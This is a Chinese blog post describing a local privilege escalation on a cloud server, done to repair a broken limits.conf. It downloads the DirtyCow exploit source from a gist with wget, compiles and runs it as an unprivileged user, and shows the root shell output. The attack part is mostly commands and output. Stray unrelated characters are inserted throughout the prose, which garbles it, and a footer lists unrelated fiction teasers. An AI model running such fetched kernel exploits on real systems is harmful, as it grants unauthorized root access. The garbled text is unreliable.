一次本地提權的實戰(zhàn)演練

Why

開發(fā)同學在線上一臺公有云的機器上調(diào)試系統(tǒng)環(huán)境的時候腕巡,把 /etc/security/limits.conf 給改壞了砂碉,這是第二次改壞這個文件了恋谭,具體怎么改壞的弥虐,為什么改壞了會導致不能登錄我單獨來說(先挖坑)话浇,我這里只講現(xiàn)象脏毯,這一次改壞的情況還好,只影響 root 用戶幔崖,普通用戶還能登錄食店。于是就想能不能用普通用戶本地提權成 root,再去修復文件 /etc/security/limits.conf

Howto

yum -y install wget gcc;
# 安裝必需軟件
su - nagios;
# 切換成普通用戶(nagios)
id;
# 測試用戶身份權限

系統(tǒng)輸出:

uid=500(nagios) gid=500(nagios) groups=500(nagios)

可以看出用戶 nagios 是普通用戶(uid 和 gid 都是 500)

cd /tmp;
# 危險動作在 /tmp 目錄下做比較好
wget \
    https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c;
# 獲取 exploit code
gcc -pthread c0w.c -o c0w;
# 編譯之
./c0w;
# 執(zhí)行(exploit code)

系統(tǒng)輸出:

(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 9c9bf000

madvise 0

ptrace 0

再執(zhí)行:

/usr/bin/passwd;
whoami;id;

系統(tǒng)提示:

root
uid=0(root) gid=500(nagios) groups=0(root),500(nagios)

由此可以看出用戶已經(jīng)變成 root(uid 為 0)赏寇,主組還是 nagios吉嫩,但同時也已經(jīng)是 root 組成員

最后,記得把 /tmp/bak 恢復回去成 /usr/bin/passwd

mv /tmp/bak /usr/bin/passwd;
chmod 4755 /usr/bin/passwd;
chown root:root /usr/bin/passwd;

參考資料

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末嗅定,一起剝皮案震驚了整個濱河市自娩,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌渠退,老刑警劉巖忙迁,帶你破解...
    沈念sama閱讀 222,590評論 6 517
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異碎乃,居然都是意外死亡姊扔,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,157評論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門荠锭,熙熙樓的掌柜王于貴愁眉苦臉地迎上來旱眯,“玉大人,你說我怎么就攤上這事证九∩静颍” “怎么了?”我有些...
    開封第一講書人閱讀 169,301評論 0 362
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵愧怜,是天一觀的道長呀页。 經(jīng)常有香客問我,道長拥坛,這世上最難降的妖魔是什么蓬蝶? 我笑而不...
    開封第一講書人閱讀 60,078評論 1 300
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任尘分,我火速辦了婚禮,結果婚禮上丸氛,老公的妹妹穿的比我還像新娘培愁。我一直安慰自己,他們只是感情好缓窜,可當我...
    茶點故事閱讀 69,082評論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布定续。 她就那樣靜靜地躺著,像睡著了一般禾锤。 火紅的嫁衣襯著肌膚如雪私股。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,682評論 1 312
  • 城市分裂傳說
    那天恩掷,我揣著相機與錄音倡鲸,去河邊找鬼。 笑死黄娘,一個胖子當著我的面吹牛峭状,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播逼争,決...
    沈念sama閱讀 41,155評論 3 422
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼宁炫,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了氮凝?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 40,098評論 0 277
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤望忆,失蹤者是張志新(化名)和其女友劉穎罩阵,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體启摄,經(jīng)...
    沈念sama閱讀 46,638評論 1 319
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡稿壁,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,701評論 3 342
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了歉备。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片傅是。...
    茶點故事閱讀 40,852評論 1 353
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖蕾羊,靈堂內(nèi)的尸體忽然破棺而出喧笔,到底是詐尸還是另有隱情,我是刑警寧澤龟再,帶...
    沈念sama閱讀 36,520評論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布书闸,位于F島的核電站,受9級特大地震影響利凑,放射性物質(zhì)發(fā)生泄漏浆劲。R本人自食惡果不足惜嫌术,卻給世界環(huán)境...
    茶點故事閱讀 42,181評論 3 335
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望牌借。 院中可真熱鬧度气,春花似錦、人聲如沸膨报。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,674評論 0 25
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽丙躏。三九已至择示,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間晒旅,已是汗流浹背栅盲。 一陣腳步聲響...
    開封第一講書人閱讀 33,788評論 1 274
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留废恋,地道東北人谈秫。 一個月前我還...
    沈念sama閱讀 49,279評論 3 379
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像鱼鼓,于是被迫代替她去往敵國和親拟烫。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,851評論 2 361

推薦閱讀更多精彩內(nèi)容